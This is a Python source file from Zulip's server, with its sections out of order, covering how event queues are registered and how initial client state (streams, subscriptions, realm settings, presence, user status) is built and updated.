                    # field is not present in the event.
                    #
                    # TODO: Probably this should just be added to the event.
                    stream_data["stream_weekly_traffic"] = None
                    # Add stream to never_subscribed (if not invite_only)
                    state["never_subscribed"].append(stream_data)
                if "streams" in state:
                    state["streams"].append(stream)
            if "streams" in state:
                state["streams"].sort(key=lambda elt: elt["name"])
        if event["op"] == "delete":
            deleted_stream_ids = {stream["stream_id"] for stream in event["streams"]}
            if "streams" in state:
                state["streams"] = [
                    s for s in state["streams"] if s["stream_id"] not in deleted_stream_ids
                ]
            state["never_subscribed"] = [
                stream
                for stream in state["never_subscribed"]
                if stream["stream_id"] not in deleted_stream_ids
            ]
        if event["op"] == "update":
            # For legacy reasons, we call stream data 'subscriptions' in
            # the state var here, for the benefit of the JS code.
            for obj in state["subscriptions"]:
                if obj["name"].lower() == event["name"].lower():
                    obj[event["property"]] = event["value"]
                    if event["property"] == "description":
                        obj["rendered_description"] = event["rendered_description"]
                    if event.get("history_public_to_subscribers") is not None:
                        obj["history_public_to_subscribers"] = event[
                            "history_public_to_subscribers"
                        ]
                    if event.get("is_web_public") is not None:
                        obj["is_web_public"] = event["is_web_public"]
            # Also update the pure streams data
            if "streams" in state:
                for stream in state["streams"]:
                    if stream["name"].lower() == event["name"].lower():
                        prop = event["property"]
                        if prop in stream:
                            stream[prop] = event["value"]
                            if prop == "description":
                                stream["rendered_description"] = event["rendered_description"]
                            if event.get("history_public_to_subscribers") is not None:
                                stream["history_public_to_subscribers"] = event[
                                    "history_public_to_subscribers"
                                ]
                            if event.get("is_web_public") is not None:
                                stream["is_web_public"] = event["is_web_public"]
    elif event["type"] == "default_streams":
        state["realm_default_streams"] = event["default_streams"]
    elif event["type"] == "default_stream_groups":
        state["realm_default_stream_groups"] = event["default_stream_groups"]
    elif event["type"] == "realm":
        if event["op"] == "update":
            field = "realm_" + event["property"]
            state[field] = event["value"]
            if event["property"] == "plan_type":
                # Then there are some extra fields that also need to be set.
                state["zulip_plan_is_not_limited"] = event["value"] != Realm.PLAN_TYPE_LIMITED
                state["realm_upload_quota_mib"] = event["extra_data"]["upload_quota"]
            # Maps realm policy properties to the derived per-user
            # permission fields they influence in `state`.
            policy_permission_dict = {
                "create_public_stream_policy": "can_create_public_streams",
                "create_private_stream_policy": "can_create_private_streams",
                "create_web_public_stream_policy": "can_create_web_public_streams",
                "invite_to_stream_policy": "can_subscribe_other_users",
                "invite_to_realm_policy": "can_invite_others_to_realm",
            }
            # Tricky interaction: Whether we can create streams and can subscribe other users
            # can get changed here.
            if field == "realm_waiting_period_threshold":
                for policy, permission in policy_permission_dict.items():
                    if permission in state:
                        state[permission] = user_profile.has_permission(policy)
            if event["property"] in policy_permission_dict.keys():
                if policy_permission_dict[event["property"]] in state:
                    state[policy_permission_dict[event["property"]]] = user_profile.has_permission(
                        event["property"]
                    )
            # Finally, we need to recompute this value from its inputs.
            state["can_create_streams"] = (
                state["can_create_private_streams"]
                or state["can_create_public_streams"]
                or state["can_create_web_public_streams"]
            )
        elif event["op"] == "update_dict":
            for key, value in event["data"].items():
                state["realm_" + key] = value
                # It's a bit messy, but this is where we need to
                # update the state for whether password authentication
                # is enabled on this server.
                if key == "authentication_methods":
                    state["realm_password_auth_enabled"] = value["Email"] or value["LDAP"]
                    state["realm_email_auth_enabled"] = value["Email"]
        elif event["op"] == "deactivated":
            # The realm has just been deactivated.  If our request had
            # arrived a moment later, we'd have rendered the
            # deactivation UI; if it'd been a moment sooner, we've
            # have rendered the app and then immediately got this
            # event (or actually, more likely, an auth error on GET
            # /events) and immediately reloaded into the same
            # deactivation UI. Passing achieves the same result.
            pass
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "realm_user_settings_defaults":
        if event["op"] == "update":
            state["realm_user_settings_defaults"][event["property"]] = event["value"]
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "subscription":
        if event["op"] == "add":
            added_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
            was_added = lambda s: s["stream_id"] in added_stream_ids
            existing_stream_ids = {sub["stream_id"] for sub in state["subscriptions"]}
            # add the new subscriptions
            for sub in event["subscriptions"]:
                if sub["stream_id"] not in existing_stream_ids:
                    if "subscribers" in sub and not include_subscribers:
                        sub = copy.deepcopy(sub)
                        del sub["subscribers"]
                    state["subscriptions"].append(sub)
            # remove them from unsubscribed if they had been there
            state["unsubscribed"] = [s for s in state["unsubscribed"] if not was_added(s)]
            # remove them from never_subscribed if they had been there
            state["never_subscribed"] = [s for s in state["never_subscribed"] if not was_added(s)]
        elif event["op"] == "remove":
            removed_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
            was_removed = lambda s: s["stream_id"] in removed_stream_ids
            # Find the subs we are affecting.
            removed_subs = list(filter(was_removed, state["subscriptions"]))
            # Remove our user from the subscribers of the removed subscriptions.
            if include_subscribers:
                for sub in removed_subs:
                    sub["subscribers"].remove(user_profile.id)
            state["unsubscribed"] += removed_subs
            # Now filter out the removed subscriptions from subscriptions.
            state["subscriptions"] = [s for s in state["subscriptions"] if not was_removed(s)]
        elif event["op"] == "update":
            for sub in state["subscriptions"]:
                if sub["stream_id"] == event["stream_id"]:
                    sub[event["property"]] = event["value"]
        elif event["op"] == "peer_add":
            if include_subscribers:
                stream_ids = set(event["stream_ids"])
                user_ids = set(event["user_ids"])
                for sub_dict in [
                    state["subscriptions"],
                    state["unsubscribed"],
                    state["never_subscribed"],
                ]:
                    for sub in sub_dict:
                        if sub["stream_id"] in stream_ids:
                            subscribers = set(sub["subscribers"]) | user_ids
                            sub["subscribers"] = sorted(list(subscribers))
        elif event["op"] == "peer_remove":
            if include_subscribers:
                stream_ids = set(event["stream_ids"])
                user_ids = set(event["user_ids"])
                for sub_dict in [
                    state["subscriptions"],
                    state["unsubscribed"],
                    state["never_subscribed"],
                ]:
                    for sub in sub_dict:
                        if sub["stream_id"] in stream_ids:
                            subscribers = set(sub["subscribers"]) - user_ids
                            sub["subscribers"] = sorted(list(subscribers))
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "presence":
        # slim_presence keys presences by user id, legacy format by email.
        if slim_presence:
            user_key = str(event["user_id"])
        else:
            user_key = event["email"]
        state["presences"][user_key] = get_presence_for_user(event["user_id"], slim_presence)[
            user_key
        ]
    elif event["type"] == "update_message":
        # We don't return messages in /register, so we don't need to
        # do anything for content updates, but we may need to update
        # the unread_msgs data if the topic of an unread message changed.
        if "new_stream_id" in event:
            stream_dict = state["raw_unread_msgs"]["stream_dict"]
            stream_id = event["new_stream_id"]
            for message_id in event["message_ids"]:
                if message_id in stream_dict:
                    stream_dict[message_id]["stream_id"] = stream_id
        if TOPIC_NAME in event:
            stream_dict = state["raw_unread_msgs"]["stream_dict"]
            topic = event[TOPIC_NAME]
            for message_id in event["message_ids"]:
                if message_id in stream_dict:
                    stream_dict[message_id]["topic"] = topic
    elif event["type"] == "delete_message":
        if "message_id" in event:
            message_ids = [event["message_id"]]
        else:
            message_ids = event["message_ids"]  # nocoverage
        # Recompute max_message_id from the database, since the deleted
        # message(s) may have included the previous maximum.
        max_message = (
            Message.objects.filter(usermessage__user_profile=user_profile).order_by("-id").first()
        )
        if max_message:
            state["max_message_id"] = max_message.id
        else:
            state["max_message_id"] = -1
        if "raw_unread_msgs" in state:
            for remove_id in message_ids:
                remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
        # The remainder of this block is about maintaining recent_private_conversations
        if "raw_recent_private_conversations" not in state or event["message_type"] != "private":
            return
        # OK, we just deleted what had been the max_message_id for
        # this recent conversation; we need to recompute that value
        # from scratch.  Definitely don't need to re-query everything,
        # but this case is likely rare enough that it's reasonable to do so.
        state["raw_recent_private_conversations"] = get_recent_private_conversations(user_profile)
    elif event["type"] == "reaction":
        # The client will get the message with the reactions directly
        pass
    elif event["type"] == "submessage":
        # The client will get submessages with their messages
        pass
    elif event["type"] == "typing":
        # Typing notification events are transient and thus ignored
        pass
    elif event["type"] == "attachment":
        # Attachment events are just for updating the "uploads" UI;
        # they are not sent directly.
        pass
    elif event["type"] == "update_message_flags":
        # We don't return messages in `/register`, so most flags we
        # can ignore, but we do need to update the unread_msgs data if
        # unread state is changed.
        if "raw_unread_msgs" in state and event["flag"] == "read" and event["op"] == "add":
            for remove_id in event["messages"]:
                remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
        if event["flag"] == "starred" and "starred_messages" in state:
            if event["op"] == "add":
                state["starred_messages"] += event["messages"]
            if event["op"] == "remove":
                state["starred_messages"] = [
                    message
                    for message in state["starred_messages"]
                    if not (message in event["messages"])
                ]
    elif event["type"] == "realm_domains":
        if event["op"] == "add":
            state["realm_domains"].append(event["realm_domain"])
        elif event["op"] == "change":
            for realm_domain in state["realm_domains"]:
                if realm_domain["domain"] == event["realm_domain"]["domain"]:
                    realm_domain["allow_subdomains"] = event["realm_domain"]["allow_subdomains"]
        elif event["op"] == "remove":
            state["realm_domains"] = [
                realm_domain
                for realm_domain in state["realm_domains"]
                if realm_domain["domain"] != event["domain"]
            ]
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "realm_emoji":
        state["realm_emoji"] = event["realm_emoji"]
    elif event["type"] == "realm_export":
        # These realm export events are only available to
        # administrators, and aren't included in page_params.
        pass
    elif event["type"] == "alert_words":
        state["alert_words"] = event["alert_words"]
    elif event["type"] == "muted_topics":
        state["muted_topics"] = event["muted_topics"]
    elif event["type"] == "muted_users":
        state["muted_users"] = event["muted_users"]
    elif event["type"] == "realm_filters":
        state["realm_filters"] = event["realm_filters"]
    elif event["type"] == "realm_linkifiers":
        state["realm_linkifiers"] = event["realm_linkifiers"]
    elif event["type"] == "realm_playgrounds":
        state["realm_playgrounds"] = event["realm_playgrounds"]
    elif event["type"] == "update_display_settings":
        if event["setting_name"] != "timezone":
            assert event["setting_name"] in UserProfile.display_settings_legacy
        state[event["setting_name"]] = event["setting"]
    elif event["type"] == "update_global_notifications":
        assert event["notification_name"] in UserProfile.notification_settings_legacy
        state[event["notification_name"]] = event["setting"]
    elif event["type"] == "user_settings":
        # timezone setting is not included in property_types dict because
        # this setting is not a part of UserBaseSettings class.
        if event["property"] != "timezone":
            assert event["property"] in UserProfile.property_types
        if event["property"] in {
            **UserProfile.display_settings_legacy,
            **UserProfile.notification_settings_legacy,
        }:
            state[event["property"]] = event["value"]
        state["user_settings"][event["property"]] = event["value"]
    elif event["type"] == "invites_changed":
        pass
    elif event["type"] == "user_group":
        if event["op"] == "add":
            state["realm_user_groups"].append(event["group"])
            state["realm_user_groups"].sort(key=lambda group: group["id"])
        elif event["op"] == "update":
            for user_group in state["realm_user_groups"]:
                if user_group["id"] == event["group_id"]:
                    user_group.update(event["data"])
        elif event["op"] == "add_members":
            for user_group in state["realm_user_groups"]:
                if user_group["id"] == event["group_id"]:
                    user_group["members"].extend(event["user_ids"])
                    user_group["members"].sort()
        elif event["op"] == "remove_members":
            for user_group in state["realm_user_groups"]:
                if user_group["id"] == event["group_id"]:
                    members = set(user_group["members"])
                    user_group["members"] = list(members - set(event["user_ids"]))
                    user_group["members"].sort()
        elif event["op"] == "remove":
            state["realm_user_groups"] = [
                ug for ug in state["realm_user_groups"] if ug["id"] != event["group_id"]
            ]
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "user_status":
        # Each optional field is applied independently; an empty-string
        # value clears the field, and a user entry with no fields left
        # is dropped entirely.
        user_id_str = str(event["user_id"])
        user_status = state["user_status"]
        away = event.get("away")
        status_text = event.get("status_text")
        emoji_name = event.get("emoji_name")
        emoji_code = event.get("emoji_code")
        reaction_type = event.get("reaction_type")
        if user_id_str not in user_status:
            user_status[user_id_str] = {}
        if away is not None:
            if away:
                user_status[user_id_str]["away"] = True
            else:
                user_status[user_id_str].pop("away", None)
        if status_text is not None:
            if status_text == "":
                user_status[user_id_str].pop("status_text", None)
            else:
                user_status[user_id_str]["status_text"] = status_text
        if emoji_name is not None:
            if emoji_name == "":
                user_status[user_id_str].pop("emoji_name", None)
            else:
                user_status[user_id_str]["emoji_name"] = emoji_name
        if emoji_code is not None:
            if emoji_code == "":
                user_status[user_id_str].pop("emoji_code", None)
            else:
                user_status[user_id_str]["emoji_code"] = emoji_code
        if reaction_type is not None:
            if reaction_type == UserStatus.UNICODE_EMOJI and emoji_name == "":
                user_status[user_id_str].pop("reaction_type", None)
            else:
                user_status[user_id_str]["reaction_type"] = reaction_type
        if not user_status[user_id_str]:
            user_status.pop(user_id_str, None)
        state["user_status"] = user_status
    elif event["type"] == "has_zoom_token":
        state["has_zoom_token"] = event["value"]
    else:
        raise AssertionError("Unexpected event type {}".format(event["type"]))
def do_events_register(
    user_profile: UserProfile,
    user_client: Client,
    apply_markdown: bool = True,
    client_gravatar: bool = False,
    slim_presence: bool = False,
    event_types: Optional[Sequence[str]] = None,
    queue_lifespan_secs: int = 0,
    all_public_streams: bool = False,
    include_subscribers: bool = True,
    include_streams: bool = True,
    client_capabilities: Optional[Dict[str, bool]] = None,
    narrow: Optional[Collection[Sequence[str]]] = None,
    fetch_event_types: Optional[Collection[str]] = None,
) -> Dict[str, Any]:
    """Register an event queue for `user_profile` and return the initial
    state payload for /register, with any events that arrived during the
    state fetch already applied.

    Raises JsonableError if Tornado could not allocate an event queue.
    The returned dict always contains `last_event_id` (-1 if no events
    arrived while fetching initial state).
    """
    # Avoid mutable default arguments: normalize the None sentinels here.
    if client_capabilities is None:
        client_capabilities = {}
    if narrow is None:
        narrow = []

    # Technically we don't need to check this here because
    # build_narrow_filter will check it, but it's nicer from an error
    # handling perspective to do it before contacting Tornado
    check_supported_events_narrow_filter(narrow)

    notification_settings_null = client_capabilities.get("notification_settings_null", False)
    bulk_message_deletion = client_capabilities.get("bulk_message_deletion", False)
    user_avatar_url_field_optional = client_capabilities.get(
        "user_avatar_url_field_optional", False
    )
    stream_typing_notifications = client_capabilities.get("stream_typing_notifications", False)
    user_settings_object = client_capabilities.get("user_settings_object", False)

    if user_profile.realm.email_address_visibility != Realm.EMAIL_ADDRESS_VISIBILITY_EVERYONE:
        # If real email addresses are not available to the user, their
        # clients cannot compute gravatars, so we force-set it to false.
        client_gravatar = False

    if fetch_event_types is not None:
        event_types_set: Optional[Set[str]] = set(fetch_event_types)
    elif event_types is not None:
        event_types_set = set(event_types)
    else:
        event_types_set = None

    # Fill up the UserMessage rows if a soft-deactivated user has returned
    reactivate_user_if_soft_deactivated(user_profile)

    while True:
        # Note that we pass event_types, not fetch_event_types here, since
        # that's what controls which future events are sent.
        queue_id = request_event_queue(
            user_profile,
            user_client,
            apply_markdown,
            client_gravatar,
            slim_presence,
            queue_lifespan_secs,
            event_types,
            all_public_streams,
            narrow=narrow,
            bulk_message_deletion=bulk_message_deletion,
            stream_typing_notifications=stream_typing_notifications,
            user_settings_object=user_settings_object,
        )
        if queue_id is None:
            raise JsonableError(_("Could not allocate event queue"))

        ret = fetch_initial_state_data(
            user_profile,
            event_types=event_types_set,
            queue_id=queue_id,
            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            user_settings_object=user_settings_object,
            slim_presence=slim_presence,
            include_subscribers=include_subscribers,
            include_streams=include_streams,
        )

        # Apply events that came in while we were fetching initial data
        events = get_user_events(user_profile, queue_id, -1)
        try:
            apply_events(
                user_profile,
                state=ret,
                events=events,
                fetch_event_types=fetch_event_types,
                client_gravatar=client_gravatar,
                slim_presence=slim_presence,
                include_subscribers=include_subscribers,
            )
        except RestartEventException:
            # This represents a rare race condition, where Tornado
            # restarted (and sent `restart` events) while we were waiting
            # for fetch_initial_state_data to return. To avoid the client
            # needing to reload shortly after loading, we recursively call
            # do_events_register here.
            continue
        else:
            break

    post_process_state(user_profile, ret, notification_settings_null)

    if len(events) > 0:
        ret["last_event_id"] = events[-1]["id"]
    else:
        ret["last_event_id"] = -1
    return ret
def post_process_state(
    user_profile: Optional[UserProfile], ret: Dict[str, Any], notification_settings_null: bool
) -> None:
    """
    NOTE:
    Below is an example of post-processing initial state data AFTER we
    apply events.  For large payloads like `unread_msgs`, it's helpful
    to have an intermediate data structure that is easy to manipulate
    with O(1)-type operations as we apply events.
    Then, only at the end, we put it in the form that's more appropriate
    for client.
    """
    # Collapse the raw unread-message structure into its client format.
    if "raw_unread_msgs" in ret:
        ret["unread_msgs"] = aggregate_unread_data(ret["raw_unread_msgs"])
        del ret["raw_unread_msgs"]
    """
    See the note above; the same technique applies below.
    """
    if "raw_users" in ret:
        user_dicts = list(ret["raw_users"].values())
        user_dicts = sorted(user_dicts, key=lambda x: x["user_id"])
        ret["realm_users"] = [d for d in user_dicts if d["is_active"]]
        ret["realm_non_active_users"] = [d for d in user_dicts if not d["is_active"]]
        """
        Be aware that we do intentional aliasing in the below code.
        We can now safely remove the `is_active` field from all the
        dicts that got partitioned into the two lists above.
        We remove the field because it's already implied, and sending
        it to clients makes clients prone to bugs where they "trust"
        the field but don't actually update in live updates.  It also
        wastes bandwidth.
        """
        for d in user_dicts:
            d.pop("is_active")
        del ret["raw_users"]
    if "raw_recent_private_conversations" in ret:
        # Reformat recent_private_conversations to be a list of dictionaries, rather than a dict.
        # Sorted most-recent first (descending max_message_id).
        ret["recent_private_conversations"] = sorted(
            (
                dict(
                    **value,
                )
                for (recipient_id, value) in ret["raw_recent_private_conversations"].items()
            ),
            key=lambda x: -x["max_message_id"],
        )
        del ret["raw_recent_private_conversations"]
    if not notification_settings_null and "subscriptions" in ret:
        # Back-fill legacy per-stream notification settings for clients
        # that did not declare the notification_settings_null capability.
        for stream_dict in ret["subscriptions"] + ret["unsubscribed"]:
            handle_stream_notifications_compatibility(
                user_profile, stream_dict, notification_settings_null
            )
| 45.292867 | 100 | 0.616124 |
import copy
import time
from typing import Any, Callable, Collection, Dict, Iterable, Optional, Sequence, Set
from django.conf import settings
from django.utils.translation import gettext as _
from version import API_FEATURE_LEVEL, ZULIP_MERGE_BASE, ZULIP_VERSION
from zerver.lib.actions import (
default_stream_groups_to_dicts_sorted,
do_get_streams,
gather_subscriptions_helper,
get_available_notification_sounds,
get_default_streams_for_realm,
get_owned_bot_dicts,
get_web_public_streams,
get_web_public_subs,
streams_to_dicts_sorted,
)
from zerver.lib.alert_words import user_alert_words
from zerver.lib.avatar import avatar_url
from zerver.lib.bot_config import load_bot_config_template
from zerver.lib.compatibility import is_outdated_server
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.hotspots import get_next_hotspots
from zerver.lib.integrations import EMBEDDED_BOTS, WEBHOOK_INTEGRATIONS
from zerver.lib.message import (
aggregate_unread_data,
apply_unread_message_event,
extract_unread_data_from_um_rows,
get_raw_unread_data,
get_recent_conversations_recipient_id,
get_recent_private_conversations,
get_starred_message_ids,
remove_message_id_from_unread_mgs,
)
from zerver.lib.narrow import check_supported_events_narrow_filter, read_stop_words
from zerver.lib.presence import get_presence_for_user, get_presences_for_realm
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.realm_logo import get_realm_logo_source, get_realm_logo_url
from zerver.lib.soft_deactivation import reactivate_user_if_soft_deactivated
from zerver.lib.stream_subscription import handle_stream_notifications_compatibility
from zerver.lib.timestamp import datetime_to_timestamp
from zerver.lib.topic import TOPIC_NAME
from zerver.lib.topic_mutes import get_topic_mutes
from zerver.lib.user_groups import user_groups_in_realm_serialized
from zerver.lib.user_mutes import get_user_mutes
from zerver.lib.user_status import get_user_info_dict
from zerver.lib.users import get_cross_realm_dicts, get_raw_user_data, is_administrator_role
from zerver.models import (
MAX_TOPIC_NAME_LENGTH,
Client,
CustomProfileField,
Draft,
Message,
Realm,
RealmUserDefault,
Stream,
UserMessage,
UserProfile,
UserStatus,
custom_profile_fields_for_realm,
get_default_stream_groups,
get_realm_domains,
get_realm_playgrounds,
linkifiers_for_realm,
realm_filters_for_realm,
)
from zerver.tornado.django_api import get_user_events, request_event_queue
from zproject.backends import email_auth_enabled, password_auth_enabled
class RestartEventException(Exception):
    """Raised when a `restart` event is encountered while applying events,
    signaling that Tornado restarted mid-fetch; do_events_register catches
    this and retries the whole register flow."""
def add_realm_logo_fields(state: Dict[str, Any], realm: Realm) -> None:
    """Populate `state` with the realm's day and night logo URL/source
    fields plus the logo upload size limit."""
    # Same key insertion order as writing the four fields out longhand.
    for key_prefix, night in (("realm_logo", False), ("realm_night_logo", True)):
        state[f"{key_prefix}_url"] = get_realm_logo_url(realm, night=night)
        state[f"{key_prefix}_source"] = get_realm_logo_source(realm, night=night)
    state["max_logo_file_size_mib"] = settings.MAX_LOGO_FILE_SIZE_MIB
def always_want(msg_type: str) -> bool:
    """Predicate used by fetch_initial_state_data when no `event_types`
    filter is given: accept every message type unconditionally.

    (The argument is intentionally ignored.)
    """
    return True
def fetch_initial_state_data(
    user_profile: Optional[UserProfile],
    *,
    realm: Optional[Realm] = None,
    event_types: Optional[Iterable[str]] = None,
    queue_id: Optional[str] = "",
    client_gravatar: bool = False,
    user_avatar_url_field_optional: bool = False,
    user_settings_object: bool = False,
    slim_presence: bool = False,
    include_subscribers: bool = True,
    include_streams: bool = True,
) -> Dict[str, Any]:
    """Build the initial state dictionary for a client registration.

    When `user_profile` is None, the state is computed for an anonymous
    ("spectator") viewer of `realm`, with sensitive or per-user data
    replaced by safe defaults.

    `event_types`, when given, restricts which sections of state are
    computed (via the `want` predicate below); None means "everything".
    The remaining keyword flags mirror the /register API parameters and
    control the shape of individual sections (e.g. whether subscriber
    lists are included).
    """
    if realm is None:
        assert user_profile is not None
        realm = user_profile.realm
    state: Dict[str, Any] = {"queue_id": queue_id}
    if event_types is None:
        # If we're not restricting the event types, include all data.
        want: Callable[[str], bool] = always_want
    else:
        want = set(event_types).__contains__

    # Server version metadata is always sent, regardless of event_types.
    state["zulip_version"] = ZULIP_VERSION
    state["zulip_feature_level"] = API_FEATURE_LEVEL
    state["zulip_merge_base"] = ZULIP_MERGE_BASE
    if want("alert_words"):
        state["alert_words"] = [] if user_profile is None else user_alert_words(user_profile)
    # Spectators don't get profile data for other users, so there's no
    # need to send custom profile field data.
    if want("custom_profile_fields") and user_profile is not None:
        fields = custom_profile_fields_for_realm(realm.id)
        state["custom_profile_fields"] = [f.as_dict() for f in fields]
        state["custom_profile_field_types"] = {
            item[4]: {"id": item[0], "name": str(item[1])}
            for item in CustomProfileField.ALL_FIELD_TYPES
        }
    if want("hotspots"):
        # Anonymous users have no server-side hotspot state; any such
        # state would live in the client or local storage, rather than
        # in the database.
        state["hotspots"] = [] if user_profile is None else get_next_hotspots(user_profile)
    if want("message"):
        # Since the introduction of `anchor="latest"` in the API,
        # `max_message_id` is primarily used for generating `local_id`
        # values that are higher than this. We likely can eventually
        # remove this parameter from the API.
        user_messages = []
        if user_profile is not None:
            user_messages = (
                UserMessage.objects.filter(user_profile=user_profile)
                .order_by("-message_id")
                .values("message_id")[:1]
            )
        if user_messages:
            state["max_message_id"] = user_messages[0]["message_id"]
        else:
            state["max_message_id"] = -1
    if want("drafts"):
        # Note: if a user ever disables syncing drafts then all of
        # their old drafts stored on the server will be deleted and
        # simply retained in local storage. In which case user_drafts
        # would just be an empty queryset.
        user_draft_objects = Draft.objects.filter(user_profile=user_profile).order_by(
            "-last_edit_time"
        )[: settings.MAX_DRAFTS_IN_REGISTER_RESPONSE]
        user_draft_dicts = [draft.to_dict() for draft in user_draft_objects]
        state["drafts"] = user_draft_dicts
    if want("muted_topics"):
        state["muted_topics"] = [] if user_profile is None else get_topic_mutes(user_profile)
    if want("muted_users"):
        state["muted_users"] = [] if user_profile is None else get_user_mutes(user_profile)
    if want("presence"):
        state["presences"] = (
            {} if user_profile is None else get_presences_for_realm(realm, slim_presence)
        )
        # Send server_timestamp, to match the format of `GET /presence` requests.
        state["server_timestamp"] = time.time()
    if want("realm"):
        # The realm bundle includes both realm properties and server
        # properties, since it's rare that one would want one and not
        # the other.
        for property_name in Realm.property_types:
            state["realm_" + property_name] = getattr(realm, property_name)
        # realm_authentication_methods is a special case that doesn't
        # fit into that framework.
        state["realm_authentication_methods"] = realm.authentication_methods_dict()
        # We pretend these features are disabled because anonymous
        # users can't access them. In the future, we may want to move
        # this logic to the frontends.
        state["realm_allow_message_editing"] = (
            False if user_profile is None else realm.allow_message_editing
        )
        state["realm_edit_topic_policy"] = (
            Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.edit_topic_policy
        )
        state["realm_delete_own_message_policy"] = (
            Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.delete_own_message_policy
        )
        state["realm_message_content_edit_limit_seconds"] = realm.message_content_edit_limit_seconds
        state[
            "realm_message_content_delete_limit_seconds"
        ] = realm.message_content_delete_limit_seconds
        state[
            "realm_community_topic_editing_limit_seconds"
        ] = Realm.DEFAULT_COMMUNITY_TOPIC_EDITING_LIMIT_SECONDS
        state["realm_presence_disabled"] = True if user_profile is None else realm.presence_disabled
        state["max_avatar_file_size_mib"] = settings.MAX_AVATAR_FILE_SIZE_MIB
        state["max_file_upload_size_mib"] = settings.MAX_FILE_UPLOAD_SIZE
        state["max_icon_file_size_mib"] = settings.MAX_ICON_FILE_SIZE_MIB
        state["realm_upload_quota_mib"] = realm.upload_quota_bytes()
        state["realm_icon_url"] = realm_icon_url(realm)
        state["realm_icon_source"] = realm.icon_source
        add_realm_logo_fields(state, realm)
        state["realm_uri"] = realm.uri
        state["realm_bot_domain"] = realm.get_bot_domain()
        state["realm_available_video_chat_providers"] = realm.VIDEO_CHAT_PROVIDERS
        state["settings_send_digest_emails"] = settings.SEND_DIGEST_EMAILS
        state["realm_digest_emails_enabled"] = (
            realm.digest_emails_enabled and settings.SEND_DIGEST_EMAILS
        )
        state["realm_email_auth_enabled"] = email_auth_enabled(realm)
        state["realm_password_auth_enabled"] = password_auth_enabled(realm)
        state["server_generation"] = settings.SERVER_GENERATION
        state["realm_is_zephyr_mirror_realm"] = realm.is_zephyr_mirror_realm
        state["development_environment"] = settings.DEVELOPMENT
        state["realm_plan_type"] = realm.plan_type
        state["zulip_plan_is_not_limited"] = realm.plan_type != Realm.PLAN_TYPE_LIMITED
        state["upgrade_text_for_wide_organization_logo"] = str(Realm.UPGRADE_TEXT_STANDARD)
        state["password_min_length"] = settings.PASSWORD_MIN_LENGTH
        state["password_min_guesses"] = settings.PASSWORD_MIN_GUESSES
        state["server_inline_image_preview"] = settings.INLINE_IMAGE_PREVIEW
        state["server_inline_url_embed_preview"] = settings.INLINE_URL_EMBED_PREVIEW
        state["server_avatar_changes_disabled"] = settings.AVATAR_CHANGES_DISABLED
        state["server_name_changes_disabled"] = settings.NAME_CHANGES_DISABLED
        state["server_web_public_streams_enabled"] = settings.WEB_PUBLIC_STREAMS_ENABLED
        state["giphy_rating_options"] = realm.GIPHY_RATING_OPTIONS
        state["server_needs_upgrade"] = is_outdated_server(user_profile)
        state[
            "event_queue_longpoll_timeout_seconds"
        ] = settings.EVENT_QUEUE_LONGPOLL_TIMEOUT_SECONDS
        state["realm_push_notifications_enabled"] = push_notifications_enabled()
        state["realm_default_external_accounts"] = DEFAULT_EXTERNAL_ACCOUNTS
        if settings.JITSI_SERVER_URL is not None:
            state["jitsi_server_url"] = settings.JITSI_SERVER_URL.rstrip("/")
        else:
            state["jitsi_server_url"] = None

        # -1 is used to encode "no stream configured" for both
        # notifications streams below.
        if realm.notifications_stream and not realm.notifications_stream.deactivated:
            notifications_stream = realm.notifications_stream
            state["realm_notifications_stream_id"] = notifications_stream.id
        else:
            state["realm_notifications_stream_id"] = -1
        signup_notifications_stream = realm.get_signup_notifications_stream()
        if signup_notifications_stream:
            state["realm_signup_notifications_stream_id"] = signup_notifications_stream.id
        else:
            state["realm_signup_notifications_stream_id"] = -1
        state["max_stream_name_length"] = Stream.MAX_NAME_LENGTH
        state["max_stream_description_length"] = Stream.MAX_DESCRIPTION_LENGTH
        state["max_topic_length"] = MAX_TOPIC_NAME_LENGTH
        state["max_message_length"] = settings.MAX_MESSAGE_LENGTH
        if realm.demo_organization_scheduled_deletion_date is not None:
            state["demo_organization_scheduled_deletion_date"] = datetime_to_timestamp(
                realm.demo_organization_scheduled_deletion_date
            )
    if want("realm_user_settings_defaults"):
        realm_user_default = RealmUserDefault.objects.get(realm=realm)
        state["realm_user_settings_defaults"] = {}
        for property_name in RealmUserDefault.property_types:
            state["realm_user_settings_defaults"][property_name] = getattr(
                realm_user_default, property_name
            )
        state["realm_user_settings_defaults"][
            "emojiset_choices"
        ] = RealmUserDefault.emojiset_choices()
        state["realm_user_settings_defaults"][
            "available_notification_sounds"
        ] = get_available_notification_sounds()
    if want("realm_domains"):
        state["realm_domains"] = get_realm_domains(realm)
    if want("realm_emoji"):
        state["realm_emoji"] = realm.get_emoji()
    if want("realm_linkifiers"):
        state["realm_linkifiers"] = linkifiers_for_realm(realm.id)
    if want("realm_filters"):
        state["realm_filters"] = realm_filters_for_realm(realm.id)
    if want("realm_playgrounds"):
        state["realm_playgrounds"] = get_realm_playgrounds(realm)
    if want("realm_user_groups"):
        state["realm_user_groups"] = user_groups_in_realm_serialized(realm)

    # settings_user is the profile whose personal settings we report:
    # the real user, or a placeholder guest profile for spectators.
    if user_profile is not None:
        settings_user = user_profile
    else:
        # Provide valid-looking default values for the personal
        # settings of an anonymous viewer.
        settings_user = UserProfile(
            full_name="Anonymous User",
            email="username@example.com",
            delivery_email="username@example.com",
            realm=realm,
            role=UserProfile.ROLE_GUEST,
            is_billing_admin=False,
            avatar_source=UserProfile.AVATAR_FROM_GRAVATAR,
            id=0,
        )
    if want("realm_user"):
        state["raw_users"] = get_raw_user_data(
            realm,
            user_profile,
